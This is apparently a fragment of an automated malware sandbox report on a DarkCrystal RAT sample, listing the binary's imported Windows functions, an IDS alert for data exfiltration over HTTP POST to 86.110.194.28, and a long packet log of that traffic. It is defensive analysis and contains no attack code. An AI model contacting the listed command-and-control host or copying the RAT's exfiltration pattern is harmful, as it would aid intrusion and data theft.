KERNEL32.dll | GetLastError, SetLastError, FormatMessageW, GetCurrentProcess, DeviceIoControl, SetFileTime, CloseHandle, CreateDirectoryW, RemoveDirectoryW, CreateFileW, DeleteFileW, CreateHardLinkW, GetShortPathNameW, GetLongPathNameW, MoveFileW, GetFileType, GetStdHandle, WriteFile, ReadFile, FlushFileBuffers, SetEndOfFile, SetFilePointer, SetFileAttributesW, GetFileAttributesW, FindClose, FindFirstFileW, FindNextFileW, InterlockedDecrement, GetVersionExW, GetCurrentDirectoryW, GetFullPathNameW, FoldStringW, GetModuleFileNameW, GetModuleHandleW, FindResourceW, FreeLibrary, GetProcAddress, GetCurrentProcessId, ExitProcess, SetThreadExecutionState, Sleep, LoadLibraryW, GetSystemDirectoryW, CompareStringW, AllocConsole, FreeConsole, AttachConsole, WriteConsoleW, GetProcessAffinityMask, CreateThread, SetThreadPriority, InitializeCriticalSection, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, SetEvent, ResetEvent, ReleaseSemaphore, WaitForSingleObject, CreateEventW, CreateSemaphoreW, GetSystemTime, SystemTimeToTzSpecificLocalTime, TzSpecificLocalTimeToSystemTime, SystemTimeToFileTime, FileTimeToLocalFileTime, LocalFileTimeToFileTime, FileTimeToSystemTime, GetCPInfo, IsDBCSLeadByte, MultiByteToWideChar, WideCharToMultiByte, GlobalAlloc, LockResource, GlobalLock, GlobalUnlock, GlobalFree, LoadResource, SizeofResource, SetCurrentDirectoryW, GetExitCodeProcess, GetLocalTime, GetTickCount, MapViewOfFile, UnmapViewOfFile, CreateFileMappingW, OpenFileMappingW, GetCommandLineW, SetEnvironmentVariableW, ExpandEnvironmentStringsW, GetTempPathW, MoveFileExW, GetLocaleInfoW, GetTimeFormatW, GetDateFormatW, GetNumberFormatW, DecodePointer, SetFilePointerEx, GetConsoleMode, GetConsoleCP, HeapSize, SetStdHandle, GetProcessHeap, FreeEnvironmentStringsW, GetEnvironmentStringsW, GetCommandLineA, GetOEMCP, RaiseException, GetSystemInfo, VirtualProtect, VirtualQuery, LoadLibraryExA, IsProcessorFeaturePresent, IsDebuggerPresent, UnhandledExceptionFilter, SetUnhandledExceptionFilter, GetStartupInfoW, QueryPerformanceCounter, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, TerminateProcess, LocalFree, RtlUnwind, EncodePointer, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, LoadLibraryExW, QueryPerformanceFrequency, GetModuleHandleExW, GetModuleFileNameA, GetACP, HeapFree, HeapAlloc, HeapReAlloc, GetStringTypeW, LCMapStringW, FindFirstFileExA, FindNextFileA, IsValidCodePage
OLEAUT32.dll | SysAllocString, SysFreeString, VariantClear
gdiplus.dll | GdipAlloc, GdipDisposeImage, GdipCloneImage, GdipCreateBitmapFromStream, GdipCreateBitmapFromStreamICM, GdipCreateHBITMAPFromBitmap, GdiplusStartup, GdiplusShutdown, GdipFree
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-03T07:58:07.640288+0100 | 2048130 | ET MALWARE [ANY.RUN] DarkCrystal Rat Exfiltration (POST) | 1 | 192.168.2.4 | 49764 | 86.110.194.28 | 80 | TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                                                                                                        Jan 3, 2025 07:57:53.630636930 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.635571957 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:53.635665894 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.855545044 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:53.860416889 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.214878082 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.219796896 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.219821930 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.219830990 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.324572086 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.330482006 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.332837105 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.332926035 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.337661028 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.353739023 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.402285099 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.492264986 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.684022903 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:54.688895941 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.688966990 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.708081007 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:54.710778952 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.060072899 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.115334034 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.115611076 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.120470047 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.120546103 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.120579958 CET804974786.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.120630980 CET4974780192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.196461916 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.196554899 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.435126066 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.439985991 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.792983055 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:55.797871113 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.797888994 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.797899961 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.801687002 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:55.917902946 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.012303114 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.106753111 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.443931103 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.444956064 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.445406914 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.449388027 CET804974986.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.449443102 CET4974980192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.450057030 CET804975086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.450112104 CET4975080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.450180054 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.450247049 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.450413942 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.455171108 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.808628082 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:56.813467979 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.813481092 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:56.813489914 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:57.143516064 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:57.277714014 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:57.277780056 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.276115894 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.276503086 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.281033993 CET804975186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.281084061 CET4975180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.281359911 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.281423092 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.281563997 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.286283970 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.636800051 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:57:59.641938925 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.641952038 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.641963005 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:57:59.959013939 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.027306080 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.090744019 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.136657953 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.200845957 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.200912952 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.205739021 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.205832005 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.205846071 CET804975386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.205894947 CET4975380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.205971956 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.210701942 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.315032959 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.318263054 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.319870949 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.319941998 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.320075989 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.324810982 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.364084959 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.667983055 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:00.672904968 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.672918081 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.672925949 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.677817106 CET804975486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:00.677884102 CET4975480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:01.016110897 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:01.146109104 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:01.146167994 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.019906998 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.020174980 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.024936914 CET804975586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.025022984 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.025080919 CET4975580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.025109053 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.025249958 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.029999018 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.371134043 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.376048088 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.376061916 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.376070976 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.703752995 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.824165106 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.830867052 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.933530092 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.989988089 CET4975680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.990463018 CET4975880192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:02.994988918 CET804975686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:02.995235920 CET804975886.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645275116 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645334959 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645334959 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645349026 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645371914 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645380020 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645385027 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645401001 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645407915 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645437002 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645450115 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645457983 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645471096 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645500898 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645513058 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645523071 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645534039 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645544052 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645546913 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645571947 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645595074 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645602942 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645607948 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645642996 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645642996 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645656109 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645668030 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645692110 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645693064 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.645704985 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645729065 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645740986 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645755053 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645783901 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645827055 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645838976 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645874023 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645888090 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645924091 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645935059 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.645950079 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649681091 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649707079 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649779081 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649791956 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649890900 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649903059 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649919033 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649930000 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649971962 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.649985075 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650002003 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650023937 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650090933 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650104046 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650118113 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650156975 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650177956 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650190115 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650253057 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650266886 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650336027 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650357962 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650381088 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650392056 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650414944 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650428057 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650471926 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650484085 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650504112 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650516033 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650535107 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650609970 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650621891 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650634050 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650655031 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650666952 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650688887 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650701046 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650752068 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650763988 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650787115 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650799036 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650849104 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650861025 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650898933 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650911093 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650924921 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650948048 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.650991917 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651010990 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651051998 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651063919 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651087046 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651098013 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651120901 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.651132107 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.933615923 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:07.938596964 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.938616037 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:07.938628912 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.246427059 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.265281916 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.398668051 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.398724079 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.417910099 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.533484936 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.533545017 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.533854961 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538541079 CET804976486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.538605928 CET4976480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538691998 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.538749933 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538783073 CET804977086.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.538825989 CET4977080192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.538908958 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.543735981 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:08.886769056 CET4977680192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:08.891854048 CET804977686.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.874753952 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:17.902307034 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:17.924994946 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.007606983 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.010792017 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.011668921 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.155054092 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.155113935 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.155148983 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.155421972 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.160258055 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.162800074 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.162906885 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.164637089 CET804983586.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.164649010 CET804984186.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.164699078 CET4983580192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.164712906 CET4984180192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.164742947 CET804984486.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.166821957 CET4984480192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.167717934 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.511818886 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.516694069 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.516706944 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.516715050 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.867566109 CET804985386.110.194.28192.168.2.4
                                                                                                                                                                        Jan 3, 2025 07:58:18.917932034 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.991837978 CET4985380192.168.2.486.110.194.28
                                                                                                                                                                        Jan 3, 2025 07:58:18.991854906 CET4985880192.168.2.486.110.194.28
